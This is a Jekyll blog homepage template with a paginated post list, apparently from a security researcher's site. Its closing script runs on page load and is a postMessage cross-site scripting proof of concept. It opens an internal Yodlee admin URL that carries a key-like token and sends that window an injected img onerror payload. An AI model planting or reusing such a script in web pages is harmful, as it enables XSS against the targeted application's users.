---
layout: default
title: Home
---

<p align="right"><b><u>Reconnaissance is the key!  Fuzz for the hole!</u></b></p><br><br>

  {% for post in paginator.posts %}
  <div class="post">
    <h1 class="post-title">
      <a href="{{ post.url }}">
        {{ post.title }}
      </a>
    </h1>
    
    <span class="post-date">{{ post.date | date_to_string }}</span>

    {{ post.content }}
  </div>
  {% endfor %}


<div class="pagination"> 
  {% if paginator.previous_page %}
    {% if paginator.page == 2 %}
      <a class="pagination-item newer" href="{{ site.baseurl }}">Newer</a>
    {% else %}
      <a class="pagination-item newer" href="{{ site.baseurl }}page{{paginator.previous_page}}">Newer</a>
    {% endif %}
  {% else %}
    <span class="pagination-item newer">Newer</span>
  {% endif %}
  {% if paginator.next_page %}
    <a class="pagination-item older" href="{{ site.baseurl }}page{{paginator.next_page}}">Older</a>
  {% else %}
    <span class="pagination-item older">Older</span>
  {% endif %}
</div>

<script>
  uri = "https://192.168.57.177:8943/ycc/unAssignedSrQueue.ymc.do?command=unAssignedSrView&sr.yodleeStatusString=1,2,3,6,7,8,9&sr.unassigned=true&c=csit_key_0%3AUgrdA8d0ffc6gNL5Bg5ffOQ47h8%3D&l=command:sr.yodleeStatusString:sr.unassigned";
  var targetWindow = window.open(uri, "_blank");
  var message = 'a<dcData>haha</dcData><page>b</page>c<url>d</url>e<count>abcd</span><img src=x onerror=alert(0)><span>abcd</count>f<dcId>1</dcId>g';
  targetWindow.postMessage(message, "*");

</script>
